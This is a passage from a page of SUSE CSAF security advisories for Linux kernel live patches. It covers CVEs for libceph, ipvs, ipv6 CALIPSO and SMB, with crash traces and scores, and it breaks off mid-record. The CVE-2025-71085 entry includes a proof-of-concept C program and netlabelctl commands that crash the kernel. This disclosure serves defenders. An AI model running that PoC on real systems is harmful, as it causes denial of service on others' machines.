"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_65-default-7-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:34:58Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1096-1
Vulnerability from csaf_suse - Published: 2026-03-27 04:04 - Updated: 2026-03-27 04:04
Summary
Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.16 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1103
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.8 (High)
7.3 (High)
7.5 (High)
7.5 (High)
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.16 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1103",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1096-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1096-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261096-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1096-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025014.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T04:04:40Z",
"generator": {
"date": "2026-03-27T04:04:40Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1096-1",
"initial_release_date": "2026-03-27T04:04:40Z",
"revision_history": [
{
"date": "2026-03-27T04:04:40Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
